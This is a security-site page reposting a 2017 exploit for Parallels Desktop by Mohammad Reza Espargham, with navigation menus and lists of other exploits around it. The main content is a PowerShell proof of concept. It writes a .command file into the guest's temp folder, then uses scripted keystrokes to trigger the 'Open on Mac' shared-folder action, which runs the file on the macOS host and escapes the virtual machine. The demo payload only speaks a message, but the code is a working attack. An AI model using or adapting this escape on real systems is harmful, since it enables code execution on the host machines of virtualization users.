首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Parallels Desktop - Virtual Machine Escape
来源:www.reza.es 作者:Espargham 发布时间:2017-06-06  
#[+] Title:  Parallels Desktop - Virtual Machine Escape
#[+] Product: Parallels
#[+] Vendor: http://www.parallels.com/products/desktop/
#[+] Affected Versions: All Version
#
#
# Author      :   Mohammad Reza Espargham
# Linkedin    :   https://ir.linkedin.com/in/rezasp
# E-Mail      :   me[at]reza[dot]es , reza.espargham[at]gmail[dot]com
# Website     :   www.reza.es
# Twitter     :   https://twitter.com/rezesp
# FaceBook    :   https://www.facebook.com/reza.espargham
# Github : github.com/rezasp
# youtube : https://youtu.be/_nZ4y0ZTrwA
#
#
 
#There is a security issue in the shared folder implementation in Parallels Desktop
#DLL : PrlToolsShellExt.dll  10.2.0 (28956)
#prl_tg Driver
 
 
#Very simple exploit with powershell
#powershell.exe poc.ps1
 
#Write OSX Executable file in temp
[io.file]::WriteAllText($env:temp + '\r3z4.command',"Say 'You are hacked by 1337'")
 
 
add-type -AssemblyName microsoft.VisualBasic
 
add-type -AssemblyName System.Windows.Forms
 
#open temp in explorer
explorer $env:temp
 
#wait for 500 miliseconds
start-sleep -Milliseconds 500
 
#select Temp active window
[Microsoft.VisualBasic.Interaction]::AppActivate("Temp")
 
#find r3z4.command file
[System.Windows.Forms.SendKeys]::SendWait("r3z4")
 
#right click
[System.Windows.Forms.SendKeys]::SendWait("+({F10})")
 
#goto "Open on Mac" in menu
[System.Windows.Forms.SendKeys]::SendWait("{DOWN}")
[System.Windows.Forms.SendKeys]::SendWait("{DOWN}")
[System.Windows.Forms.SendKeys]::SendWait("{DOWN}")
 
#Click Enter
[System.Windows.Forms.SendKeys]::SendWait("~")
 
#Enjoy ;)s
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·DNSTracer 1.8.1 - Buffer Overf
·BIND 9.10.5 - Unquoted Service
·EnGenius EnShare IoT Gigabit C
·Cisco Catalyst 2960 IOS 12.2(5
·Disk Sorter 9.7.14 - 'Input Di
·DC/OS Marathon UI - Docker Exp
·Intel AMT Digest Authenticatio
·Linux Kernel - 'ping' Local De
·ScadaBR Credentials Dumper Exp
·Linux Kernel < 4.10.13 - 'keyc
·Sudo get_process_ttyname() Rac
·PuTTY < 0.68 - 'ssh_agent_chan
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved